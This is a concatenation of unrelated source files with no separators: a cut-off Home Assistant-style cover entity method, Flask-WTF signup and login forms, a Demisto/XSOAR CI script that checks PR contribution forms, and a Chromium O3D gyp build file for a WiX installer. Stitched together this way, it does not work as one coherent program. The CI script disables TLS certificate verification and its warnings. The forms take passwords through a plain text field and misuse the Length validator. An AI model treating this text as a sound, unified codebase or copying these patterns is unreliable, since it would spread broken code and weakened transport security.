self.async_set_cover_position(position=100) async def async_close_cover(self, **kwargs): """Close the cover.""" await self.async_set_cover_position(position=0) async def async_set_cover_position(self, **kwargs): """Async function to set position to cover.""" payload = {} payload["position"] = kwargs[ATTR_POSITION] payload = json.dumps(payload) await put_state( self._session, self._api_key, self.unique_id, payload, ) await self.coordinator.async_request_refresh()
from flask_wtf import FlaskForm from wtforms import StringField from wtforms import validators class UserSignupForm(FlaskForm): username = StringField('username', default="username *", validators=[validators.DataRequired()]) email = StringField("email", default="your@email.com *", validators=[validators.Email(message="Please enter a valid email")]) password = StringField('password', default="password *", validators=[validators.DataRequired()]) password_confirm = StringField('confirm', default="confirm *", validators=[validators.DataRequired()]) class UserLoginForm(FlaskForm): username = StringField('username', validators=[validators.DataRequired()]) password = StringField('password', validators=[validators.DataRequired()]) class UserForm(FlaskForm): username = StringField('username', validators=[validators.DataRequired()]) email = StringField("email", validators=[validators.Email(message="Please enter a valid email")]) image_url = StringField('avatar (URL)', [validators.Length(validators.DataRequired())])
#!/usr/bin/env python3 import argparse import os import sys import re import json import base64 import urllib3 from github import Github from github.PullRequest import PullRequest from github.Repository import Repository from github.ContentFile import ContentFile from github.Branch import Branch from utils import load_json, CONTENT_ROOT_PATH, timestamped_print urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) print = timestamped_print METADATA = 'pack_metadata.json' PACKS = 'Packs' SUPPORT = 'support' XSOAR_SUPPORT = 'xsoar' PACK_NAME_REGEX = re.compile(r'Packs/([A-Za-z0-9-_.]+)/') def get_metadata_filename_from_pr(pr_files, pack_name) -> str: """ Iterates over all pr files and return the pr metadata.json filename if exists, else None Args: pr_files (PaginatedList[File]): The list of pr files pack_name (str): The pack name Returns: The pr metadata.json filename if exists, else None """ pack_metadata_path = os.path.join(PACKS, pack_name, METADATA) print(f'Searching for a {pack_metadata_path} file in the PR.') for file in pr_files: if pack_metadata_path in file.filename: print(f'Found {METADATA} file in PR for pack {pack_name}: {file.filename}.') return file.filename print(f'Did not find a {pack_metadata_path} file in the PR.') return '' def get_pack_support_type_from_pr_metadata_file(pr_metadata_filename: str, pr: PullRequest): """ Retrieves the support type from the pr metadata.json file Args: pr_metadata_filename: The pr metadata.json filename pr: The pr Returns: The support type """ print(f'Getting support type from {pr_metadata_filename}.') _, branch_name = pr.head.label.split(':') print(f'Branch name is: {branch_name}') contributor_repo: Repository = pr.head.repo branch: Branch = contributor_repo.get_branch(branch=branch_name) metadata_file: ContentFile = contributor_repo.get_contents(path=pr_metadata_filename, ref=branch.commit.sha) metadata_file_content: dict = json.loads(base64.b64decode(metadata_file.content)) return metadata_file_content.get(SUPPORT) def get_pack_names_from_pr(pr_files) -> set: """ Extracts the pack names from the pr files Args: pr_files (PaginatedList[File]): The list of pr files Returns: The set of pack names """ pack_names = set() for file in pr_files: if PACKS in file.filename: pack_names.add(re.findall(PACK_NAME_REGEX, file.filename)[0]) if not pack_names: raise Exception('PR does not contains files prefixed with "Packs".') return pack_names def get_pack_support_type_from_repo_metadata_file(pack_name): """ Retrieves the support type from the repo metadata.json file Args: pack_name (str): The pack name Returns: The support type """ print('Getting support type from the repo.') repo_pack_metadata_path: str = os.path.join(CONTENT_ROOT_PATH, PACKS, pack_name, METADATA) print(f'{pack_name} pack {METADATA} file is at path: {repo_pack_metadata_path}') repo_pack_metadata: dict = load_json(repo_pack_metadata_path) return repo_pack_metadata.get(SUPPORT) def arguments_handler(): """ Validates and parses script arguments. Returns: Namespace: Parsed arguments object. """ parser = argparse.ArgumentParser(description='Check if the contribution form needs to be filled.') parser.add_argument('-p', '--pr_number', help='The PR number to check if the contribution form needs to be filled.') parser.add_argument('-g', '--github_token', help='The GitHub token to authenticate the GitHub client.') return parser.parse_args() def main(): options = arguments_handler() pr_number = options.pr_number github_token = options.github_token org_name: str = 'demisto' repo_name: str = 'content' exit_status = 0 packs_without_metadata_or_support = set() not_filled_packs = set() github_client: Github = Github(github_token, verify=False) content_repo: Repository = github_client.get_repo(f'{org_name}/{repo_name}') pr: PullRequest = content_repo.get_pull(int(pr_number)) pr_files = pr.get_files() for pack_name in get_pack_names_from_pr(pr_files): if pr_metadata_filename := get_metadata_filename_from_pr(pr_files, pack_name): support_type = get_pack_support_type_from_pr_metadata_file(pr_metadata_filename, pr) else: support_type = get_pack_support_type_from_repo_metadata_file(pack_name) if not support_type: packs_without_metadata_or_support.add(pack_name) exit_status = 1 elif support_type == XSOAR_SUPPORT: print(f'\n{pack_name} pack is XSOAR supported. Contribution form should not be filled for XSOAR supported ' f'contributions.') else: not_filled_packs.add(pack_name) print(f'{pack_name} pack is {support_type} supported.') exit_status = 1 if packs_without_metadata_or_support: print(f'ERROR: {METADATA} file / pack support is missing for the following packs: ' f'{packs_without_metadata_or_support}') if not_filled_packs: print(f'\nERROR: Contribution form was not filled for PR: {pr_number}.\nMake sure to register your contribution' f' by filling the contribution registration form in - https://forms.gle/XDfxU4E61ZwEESSMA') sys.exit(exit_status) if __name__ == "__main__": main()
# Copyright (c) 2009 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. { 'variables': { 'chromium_code': 1, 'wixdir': 'third_party\\wix_2_0_4221\\files', 'dx_redist_path': '../../../o3d-internal/third_party/dx_nov_2007_redist', 'dx_redist_exists': '<!(python ../../build/file_exists.py ../../../o3d-internal/third_party/dx_nov_2007_redist/d3dx9_36.dll)', 'guidgen': '..\\..\\nbguidgen\\win\\nbguidgen.exe', 'nppversion': '<!(python ../../plugin/version_info.py --commaversion)', 'dotnppversion': '<!(python ../../plugin/version_info.py --version)', # Unique guid for o3d namespace 'o3d_namespace_guid': 'B445DBAE-F5F9-435A-9A9B-088261CDF00A', # Changing the following values would break upgrade paths, so we # hard-code the values instead of generating them. 'bad_old_o3d_upgrade_code': 'dc819ed6-4155-3cff-b580-45626aed5848', 'o3d_extras_google_update_guid': '{34B2805D-C72C-4f81-AED5-5A22D1E092F1}', 'o3d_extras_upgrade_code': 'c271f2f0-c7ad-3bc9-8216-211436aa2244', 'o3d_npp_google_update_guid': '{70308795-045C-42da-8F4E-D452381A7459}', 'o3d_npp_upgrade_code': '0f098121-2876-3c23-bd4c-501220ecbb42', # We don't actually want the extras version to update by itself; # it should change only when we actually add something to the # installer or change the d3dx9 version. This version is # therefore independent of the o3d plugin and sdk versions. 'extrasversion': '0,1,1,0', 'dotextrasversion': '0.1.1.0', # Registry paths for Google Update 'google_update_reg_path': 'Software\\Google\\Update\\Clients\\', 'google_update_state_reg_path': 'Software\\Google\\Update\\ClientState\\', }, 'includes': [ '../../build/common.gypi', ], 'targets': [ { 'target_name': 'cactions', 'type': 'shared_library', 'sources': [ 'custom_actions.cc', ], 'dependencies': [ '../../../base/base.gyp:base', '../../build/libs.gyp:cg_libs', '../../build/libs.gyp:gl_libs', '../../plugin/plugin.gyp:o3dPluginLogging', '../../statsreport/statsreport.gyp:o3dStatsReport', ], 'include_dirs': [ '../..', '../../..', '../../<(glewdir)/include', '../../<(cgdir)/include', '<(INTERMEDIATE_DIR)', '$(DXSDK_DIR)/Include', ], 'defines': [ 'NOMINMAX', 'WIN32', 'WIN32_LEAN_AND_MEAN', '_ATL_SECURE_NO_WARNINGS', '_CRT_SECURE_NO_DEPRECATE', '_UNICODE', # turn on unicode '_WIN32_WINNT=0x0600', '_WINDOWS', ], 'libraries': [ '-ladvapi32.lib', '"$(DXSDK_DIR)/Lib/x86/dxguid.lib"', '-lmsi.lib', '-lole32.lib', '-loleaut32.lib', '-lshell32.lib', '-lshlwapi.lib', '-luser32.lib', ], # Disable the #pragma deprecated warning because # ATL seems to use deprecated CRT libs. 'msvs_disabled_warnings': [4995], 'msvs_configuration_attributes': { 'UseOfATL': '1', # 1 = static link to ATL, 2 = dynamic link }, }, { 'target_name': 'installer', 'type': 'none', 'variables': { 'candle_exe': '../../../<(wixdir)/candle.exe', 'light_exe': '../../../<(wixdir)/light.exe', 'custom_actions_path': '<(PRODUCT_DIR)/cactions.dll', 'd3dx_guid': '<!(<(guidgen) <(o3d_namespace_guid) d3dx-<(nppversion))', 'dbl_path': '../../installer/win/driver_blacklist.txt', 'dx_redist_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'dx_redist-<(nppversion))', 'get_extras_path': '<(PRODUCT_DIR)/getextras.exe', 'ieplugin_path': '<(PRODUCT_DIR)/o3d_host.dll', 'include_software_renderer': '<!(python ../../build/file_exists.py ' '../../../<(swiftshaderdir)/swiftshader_d3d9.dll)', 'npplugin_path': '<(PRODUCT_DIR)/npo3dautoplugin.dll', 'o3d_driver_blacklist_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_driver_blacklist-<(nppversion))', 'o3d_get_extras_guid': '<!(<(guidgen) <(o3d_namespace_guid) extras_installer-)', 'o3d_iep_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_ieplugin_component-<(nppversion))', 'o3d_npp_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_npplugin_component-<(nppversion))', 'o3d_npp_google_update_reg_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_user_google_update_reg_component-<(nppversion))', 'o3d_npp_package_guid': '<!(<(guidgen) <(o3d_namespace_guid) o3d_package-<(nppversion))', 'o3d_npp_product_guid': '<!(<(guidgen) <(o3d_namespace_guid) o3d_product-<(nppversion))', 'o3d_npp_reg_key': '<(google_update_reg_path)<(o3d_npp_google_update_guid)', 'o3d_npp_state_reg_key': '<(google_update_state_reg_path)<(o3d_npp_google_update_guid)', 'o3d_reporter_guid': '<!(<(guidgen) <(o3d_namespace_guid) o3d_reporter-<(nppversion))', 'o3d_software_renderer_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_software_renderer-<(nppversion))', 'rep_path': '<(PRODUCT_DIR)/reporter.exe', 'software_renderer_path': '../../../<(swiftshaderdir)/swiftshader_d3d9.dll', }, 'dependencies': [ '../../converter/converter.gyp:o3dConverter', '../../breakpad/breakpad.gyp:reporter', '../../google_update/google_update.gyp:getextras', '../../documentation/documentation.gyp:*', '../../plugin/plugin.gyp:npo3dautoplugin', '../../plugin/plugin.gyp:o3d_host', '../../samples/samples.gyp:samples', '../../build/libs.gyp:cg_libs', '../../build/libs.gyp:gl_libs', 'cactions', ], 'rules': [ { 'rule_name': 'candle', 'extension': 'wxs', 'process_outputs_as_sources': 1, 'inputs': [ '<(candle_exe)', '../../installer/win/docs.url', '<(PRODUCT_DIR)/cactions.dll', '<(PRODUCT_DIR)/cg.dll', '<(PRODUCT_DIR)/cgGL.dll', '<(PRODUCT_DIR)/cgc.exe', '<(PRODUCT_DIR)/o3dConditioner.exe', '<(dbl_path)', '<(get_extras_path)', '<(ieplugin_path)', '<(npplugin_path)', '<(rep_path)', ], 'outputs': [ '<(RULE_INPUT_ROOT).wixobj', ], 'action': [ '<(candle_exe)', '-nologo', '-dCustomActionsPath=<(custom_actions_path)', '-dD3DXGuid=<(d3dx_guid)', '-dDBLGuid=<(o3d_driver_blacklist_guid)', '-dDBLPath=<(dbl_path)', '-dDeprecatedUpgradeCode=<(bad_old_o3d_upgrade_code)', '-dGetExtrasGuid=<(o3d_get_extras_guid)', '-dGetExtrasPath=<(get_extras_path)', '-dIEPluginPath=<(ieplugin_path)', '-dIepComponentGuid=<(o3d_iep_component_guid)', '-dIncludeSoftwareRenderer=include_software_renderer', '-dNPPluginPath=<(npplugin_path)', '-dNppComponentGuid=<(o3d_npp_component_guid)', '-dNppGoogleUpdateRegGuid=<(o3d_npp_google_update_reg_component_guid)', '-dNppGoogleUpdateRegKey=<(o3d_npp_reg_key)', '-dNppGoogleUpdateStateRegKey=<(o3d_npp_state_reg_key)', '-dNppPackageGuid=<(o3d_npp_package_guid)', '-dNppProductGuid=<(o3d_npp_product_guid)', '-dNppUpgradeCode=<(o3d_npp_upgrade_code)', '-dNppVersion=<(dotnppversion)', '-dRepGuid=<(o3d_reporter_guid)', '-dRepPath=<(rep_path)', '-dSoftwareRendererGuid=<(o3d_software_renderer_guid)', '-dSoftwareRendererPath=<(software_renderer_path)', '-o', '<(RULE_INPUT_ROOT).wixobj', '<(RULE_INPUT_PATH)', ], 'message': 'Generating installer from <(RULE_INPUT_PATH)', }, { 'rule_name': 'light', 'extension': 'wixobj', 'process_outputs_as_sources': 1, 'inputs': [ '<(light_exe)', ], 'outputs': [ '<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi', ], 'action': [ '<(light_exe)', '-nologo', '-out', '<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi', '<(RULE_INPUT_PATH)', ], 'message': 'Linking installer from <(RULE_INPUT_PATH)', }, ], 'sources': [ 'o3d.wxs', ], }, ], 'conditions': [ ['"<(dx_redist_exists)" == "True"', { 'targets': [ { 'target_name': 'extras_installer', 'type': 'none', 'variables': { 'candle_exe': '../../../<(wixdir)/candle.exe', 'light_exe': '../../../<(wixdir)/light.exe', 'o3d_extras_d3dx_component_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_extras_d3dx_component-<(nppversion))', 'o3d_extras_package_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_extras_package-<(extrasversion))', 'o3d_extras_product_guid': '<!(<(guidgen) <(o3d_namespace_guid) ' 'o3d_extras_product-<(extrasversion))', 'o3d_extras_reg_key': '<(google_update_reg_path)<(o3d_extras_google_update_guid)', }, 'rules': [ { 'rule_name': 'candle', 'extension': 'wxs', 'process_outputs_as_sources': 1, 'inputs': [ '<(candle_exe)', ], 'outputs': [ '<(RULE_INPUT_ROOT).wixobj', ], 'action': [ '<(candle_exe)', '-nologo', '-dDxRedistPath=<(dx_redist_path)', '-dExtrasD3DXComponentGuid=<(o3d_extras_d3dx_component_guid)', '-dExtrasGoogleUpdateRegGuid=<(o3d_extras_google_update_guid)', '-dExtrasGoogleUpdateRegKey=<(o3d_extras_reg_key)', '-dExtrasPackageGuid=<(o3d_extras_package_guid)', '-dExtrasProductGuid=<(o3d_extras_product_guid)', '-dExtrasUpgradeCode=<(o3d_extras_upgrade_code)', '-dExtrasVersion=<(dotextrasversion)', '-o', '<(RULE_INPUT_ROOT).wixobj', '<(RULE_INPUT_PATH)', ], 'message': 'Generating extras installer from <(RULE_INPUT_PATH)', }, { 'rule_name': 'light', 'extension': 'wixobj', 'process_outputs_as_sources': 1, 'inputs': [ '<(light_exe)', ], 'outputs': [ '<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi', ], 'action': [ '<(light_exe)', '-nologo', '-out', '<(PRODUCT_DIR)/<(RULE_INPUT_ROOT).msi', '<(RULE_INPUT_PATH)', ], 'message': 'Linking extras installer from <(RULE_INPUT_PATH)', }, ], 'sources': [ 'o3dextras.wxs', ], }, ], }, { 'targets': [ { 'target_name': 'extras_installer', 'type': 'none', }, ], }, ], ], } # Local Variables: # tab-width:2 # indent-tabs-mode:nil # End: # vim: set expandtab tabstop=2 shiftwidth=2: